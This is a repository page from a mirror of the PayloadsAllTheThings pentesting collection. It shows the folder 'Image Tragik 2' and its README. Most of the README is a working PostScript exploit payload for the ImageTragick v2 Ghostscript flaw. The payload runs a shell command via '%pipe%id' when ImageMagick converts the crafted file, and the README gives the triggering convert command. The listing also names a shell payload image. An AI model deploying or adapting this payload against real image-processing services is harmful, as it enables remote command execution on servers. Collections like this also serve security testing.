ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f1eefd2722
PayloadsAllTheThings/Upload insecure files/Image Tragik 2
History
Swissky 0c707c4188 ImageTragick v2 + Angular 1.6+ XSS
2018-08-22 21:42:25 +02:00
..
centos_id.jpeg ImageTragick v2 + Angular 1.6+ XSS 2018-08-22 21:42:25 +02:00
README.md ImageTragick v2 + Angular 1.6+ XSS 2018-08-22 21:42:25 +02:00
ubuntu_id.jpeg ImageTragick v2 + Angular 1.6+ XSS 2018-08-22 21:42:25 +02:00
ubuntu_shell.jpeg ImageTragick v2 + Angular 1.6+ XSS 2018-08-22 21:42:25 +02:00

README.md

Image Tragik 2

Exploit

Simple id payload

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

then use convert shellexec.jpeg whatever.gif

Thanks to